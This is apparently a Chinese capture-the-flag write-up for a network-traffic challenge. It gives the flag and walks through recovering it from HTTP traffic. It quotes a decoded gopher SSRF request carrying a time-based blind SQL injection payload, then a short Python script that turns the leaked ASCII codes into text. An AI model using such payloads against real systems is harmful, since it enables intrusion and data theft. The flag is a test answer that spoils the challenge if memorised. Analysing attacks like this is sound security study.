攻防世界MISC_流量分析1

环境

攻防世界，流量分析

flag{1qwy2781}

wp

分析出是http流量，大部分是ssrf和sql注入的payload，url解码如下

url=gopher://127.0.0.1:80/_POST /admin.php HTTP/1.1
Host: localhost:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

id=1) and if((ascii(substr((select flag from flag),9,1))='54'),sleep(3),0) -- 

过滤http.time>3，把ascii码找出来

def Tansform(list): #构造一个函数，以实现从ascii 到char 的转换，list 是参数
    output=" " #创建一个空字符串，用于存储转换后的字符
    for i in list:
        output+=chr(i)
    return output
lisT=[102, 108, 97, 103, 123, 49, 113, 119, 121, 50, 55, 56, 49, 125]#按照顺序列出 ascii 码值，查看方法同上述‘102’相同，都是两次解密后看延时注入语句，一定要按照顺序！！！
print(Tansform(lisT))#传参并打印